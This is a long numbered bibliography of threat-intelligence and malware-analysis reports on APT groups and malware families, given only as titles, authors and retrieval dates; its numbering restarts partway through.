  31. CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.
  32. Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.
  34. GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.
  36. Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.
  37. Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.
  38. Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.
  39. Lim, M.. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.
  40. CISA, FBI, CNMF. (2020, October 27). Retrieved November 4, 2020.
  41. Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
  42. Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021
  43. Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.
  44. Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
  45. Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.
  46. Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
  47. Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.
  48. Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.
  49. US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.
  50. Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.
  51. Sadique, M. and Singh, A. (2020, September 29). Spear Phishing Campaign Delivers Buer and Bazar Malware. Retrieved November 19, 2020.
  52. Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.
  53. Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
  54. Harbison, M. (2021, February 9). BendyBear: Novel Chinese Shellcode Linked With Cyber Espionage Group BlackTech. Retrieved February 16, 2021.
  55. Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
  56. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
  57. Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.
  58. Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
  59. MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.
  60. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.
  61. Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.
  62. Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.
  63. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
  64. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
  65. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  66. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
  67. Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.
  68. Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.
  69. Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
  70. Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
  71. Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.
  72. Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.
  73. Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
  74. McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.
  75. Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.
  76. ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.
  77. Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.
  78. LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.
  79. Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.
  80. Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  81. Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  82. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  83. Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.
  84. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  85. Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
  86. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
  87. Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  88. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  89. Microsoft. (n.d.). Copy. Retrieved April 26, 2016.
  90. Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
  91. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
  92. Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
  93. Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.
  94. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
  95. Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.
  96. Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.
  97. Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.
  98. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
  99. The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.
  100. Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
  101. Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved September 2, 2021.
  102. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
  103. Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.
  104. Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.
  105. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
  106. TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.
  107. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
  108. Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.
  109. Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.
  110. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
  111. McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.
  112. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  113. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
  114. Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.
  115. Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.
  116. ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
  117. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
  118. US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.
  119. Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.
  120. Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020.
  121. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
  122. Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.
  123. Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.
  124. Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.
  125. GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.
  126. Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.
  127. Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021.
  128. Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.
  130. Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  131. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  132. LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.
  133. Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
  134. Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.
  135. Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved January 28, 2021.
  136. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
  138. Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.
  139. Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
  140. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
  141. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
  142. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  143. Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.
  144. Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
  145. Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.
  146. CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.
  147. Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
  148. Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.
  149. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  150. Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.
  151. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
  152. ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
  153. Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.
  154. Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.
  155. Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.
  156. Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
  157. Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.
  158. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
  159. Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.
  160. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
  161. Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.
  162. ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.
  163. Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.
  164. Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.
  165. Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.
  166. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
  167. Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.
  168. Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
  169. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  170. Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.
  171. Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
  172. US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
  173. Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.
  174. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
  175. Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.
  176. Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.
  177. Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
  178. Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.
  179. Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.
  180. Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.
  181. Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.
  182. Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.
  183. Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
  184. Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.
  185. Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
  186. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  187. Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
  188. Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
  189. Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.
  190. Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.
  191. Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.
  192. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  193. Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.
  194. Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
  195. Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus’ new Downloader, KerrDown. Retrieved October 1, 2021.
  196. Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
  197. Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
  1. US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
  2. Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.
  3. Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.
  4. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  5. Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
  6. Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.
  7. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
  8. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
  9. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.
  10. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  11. Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.
  12. Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.
  13. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
  14. Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.
  15. Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.
  16. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  17. Hsu, K. et al. (2020, June 24). Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.
  18. ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.
  19. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
  20. GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.
  21. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
  22. Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
  23. PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
  24. US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.
  25. Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
  26. Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
  27. Zhang, X. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.
  28. ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.
  29. Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.
  30. Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
  31. Kaspersky Lab's Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.
  32. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
  33. Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.
  34. GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.
  35. Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.
  36. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
  37. Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
  38. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
  39. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  40. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  41. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  42. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
  44. The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.
  45. Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.
  46. Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.
  47. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
  48. Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.
  49. Maniath, S. and Kadam P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign's Usage of Process Hollowing. Retrieved January 7, 2021.
  50. Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.
  51. Sponchioni, R.. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.
  52. Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.
  53. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
  54. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
  55. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
  56. Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.
  57. Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.
  58. Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
  59. Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
  60. Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
  61. Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
  62. Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.
  63. Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
  64. Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.
  65. Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
  66. Patrick Wardle. (2020, August 30). Apple Approved Malware malicious code notarized!? #2020. Retrieved September 13, 2021.
  67. Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.
  68. Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.
  69. Mullaney, C. & Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.
  70. Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
  71. Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.
  72. Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.
  73. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.
  74. Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.
  75. Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
  76. Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
  77. Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.
  78. Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.
  79. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
  80. hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
  81. Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
